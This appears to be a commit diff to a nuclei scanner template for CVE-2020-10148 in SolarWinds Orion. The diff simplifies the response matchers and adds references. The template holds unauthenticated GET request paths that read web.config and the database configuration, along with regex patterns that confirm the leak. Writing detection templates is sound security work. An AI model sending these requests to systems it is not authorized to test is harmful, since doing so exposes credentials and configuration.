🔨 Simplify matchers & add more references

patch-1
Dwi Siswanto 2020-12-31 15:40:10 +07:00
parent d89f980768
commit 87f2961ed0
1 changed files with 7 additions and 7 deletions


@ -9,21 +9,21 @@ info:
commands which may result in a compromise of the SolarWinds instance.
# References:
# - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
# - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
# - https://kb.cert.org/vuls/id/843464
# - https://twitter.com/0xsha/status/1343813359355850752
requests:
- method: GET
path:
- "{{BaseURL}}/web.config.i18n.ashx"
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
- "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
matchers-condition: and
matchers:
- type: word
words:
- "orionProxy"
- "sw.web.compression"
- "SolarWinds.Orion.Core."
condition: or
- type: regex
regex:
- "SolarWinds(\\.Orion\\.Core\\.|OrionDatabaseUser)"
part: body
- type: status
status: